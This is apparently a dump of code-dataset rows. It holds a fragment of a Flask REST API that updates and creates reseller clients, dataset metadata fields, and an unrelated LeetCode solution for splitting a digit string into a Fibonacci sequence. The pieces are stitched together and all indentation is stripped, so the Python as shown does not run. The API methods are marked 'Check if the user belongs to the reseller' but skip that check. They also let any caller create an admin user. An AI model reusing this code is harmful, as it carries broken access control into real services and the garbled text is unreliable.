def put(self, target_reseller, target_client):
abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
client = abort_if_obj_doesnt_exist('name', target_client, Client)
# TODO: Validate email field
self.parser.add_argument('email', type=str)
self.parser.add_argument('phone', type=str)
self.parser.add_argument('company', type=str)
self.parser.add_argument('reseller_name', type=str)
reqdata = self.parser.parse_args()
# Check if the user belongs to the reseller
client.email = reqdata.get('email') or client.email
client.phone = reqdata.get('phone') or client.phone
client.company = reqdata.get('company') or client.company
print client.email, client.phone, client.company
if reqdata.get('reseller_name'):
if not self.is_global_admin:
abort(403, message = 'Permission denied! Does not have enough permissions.')
newreseller = Reseller.query.filter_by(name = reqdata.get('reseller_name')).first()
else:
newreseller = Reseller.query.filter_by(name = target_reseller).first()
client.reseller_id = newreseller.id
db.session.commit()
return '', 204
def post(self, target_reseller, target_client):
target_client = target_client.lower()
reseller = abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
if Client.query.filter_by(name=target_client).first():
abort(409, message='The client {} already exists'.format(target_client))
#sleep(2)
# TODO: Validate email field
self.parser.add_argument('email', type=str, required=True, case_sensitive=True)
self.parser.add_argument('login_name', type=str)
self.parser.add_argument('login', type=str, case_sensitive=True)
self.parser.add_argument('password', type=str)
self.parser.add_argument('company', type=str, required=True)
self.parser.add_argument('enable_api', type=bool, default=False)
self.parser.add_argument('admin', type=bool, default=False)
reqdata = self.parser.parse_args()
# Check if the user belongs to the reseller
client = Client(
reseller_id = reseller.id,
name = target_client,
email = reqdata['email'],
company = reqdata['company']
)
if reqdata['login'] and reqdata['login_name'] and reqdata['password']:
user = User(login = reqdata['login'],
name = reqdata['login_name'],
email = reqdata['email'],
password = Security.hash_password(reqdata['password']),
api_enabled = reqdata['enable_api'],
admin = reqdata['admin']
)
client.user = [user]
db.session.add(client)
db.session.commit()
client = Client.query.filter_by(name=target_client).one()
return {
'response' : {
'client_id' : client.id
}
}, 201 | apache-2.0 | -3,406,313,545,690,063,400 | 34.154028 | 112 | 0.649656 | false | 3.429827 | false | false | false |
kingdaa/LC-python | lc/842_Split_Array_into_Fibonacci_Sequence.py | 1 | 2475 | # 842. Split Array into Fibonacci Sequence
# Difficulty: Medium
# Given a string S of digits, such as S = "123456579", we can split it into a
# Fibonacci-like sequence [123, 456, 579].
#
# Formally, a Fibonacci-like sequence is a list F of non-negative integers
# such that:
#
# 0 <= F[i] <= 2^31 - 1, (that is, each integer fits a 32-bit signed integer
# type);
# F.length >= 3;
# and F[i] + F[i+1] = F[i+2] for all 0 <= i < F.length - 2.
# Also, note that when splitting the string into pieces, each piece must not
# have extra leading zeroes, except if the piece is the number 0 itself.
#
# Return any Fibonacci-like sequence split from S, or return [] if it cannot
# be done.
#
# Example 1:
#
# Input: "123456579"
# Output: [123,456,579]
# Example 2:
#
# Input: "11235813"
# Output: [1,1,2,3,5,8,13]
# Example 3:
#
# Input: "112358130"
# Output: []
# Explanation: The task is impossible.
# Example 4:
#
# Input: "0123"
# Output: []
# Explanation: Leading zeroes are not allowed, so "01", "2", "3" is not valid.
# Example 5:
#
# Input: "1101111"
# Output: [110, 1, 111]
# Explanation: The output [11, 0, 11, 11] would also be accepted.
# Note:
#
# 1 <= S.length <= 200
# S contains only digits.
class Solution:
def splitIntoFibonacci(self, S):
"""
:type S: str
:rtype: List[int]
"""
INT_MAX = 2 ** 31 - 1
def dfs(S, index, path):
if index == len(S) and len(path) >= 3:
return True
for i in range(index, len(S)):
if S[index] == "0" and i > index:
break
num = int(S[index:i + 1])
if num > INT_MAX:
break
l = len(path)
if l >= 2 and num > path[l - 1] + path[l - 2]:
break
if len(path) < 2 or (
num == path[l - 1] + path[l - 2]):
path.append(num)
if dfs(S, i + 1, path):
return True
path.pop()
return False
res = []
dfs(S, 0, res)
return res
if __name__ == '__main__':
s1 = "123456579"
s2 = "11235813"
s3 = "112358130"
s4 = "0123"
s5 = "1101111"
sol = Solution()
print(sol.splitIntoFibonacci(s1))
print(sol.splitIntoFibonacci(s2))
print(sol.splitIntoFibonacci(s3))
print(sol.splitIntoFibonacci(s4))
print(sol.splitIntoFibonacci(s5))
| mit | 6,509,765,307,642,917,000 | 25.902174 | 78 | 0.532929 | false | 3.051788 | false | false | false |
Subsets and Splits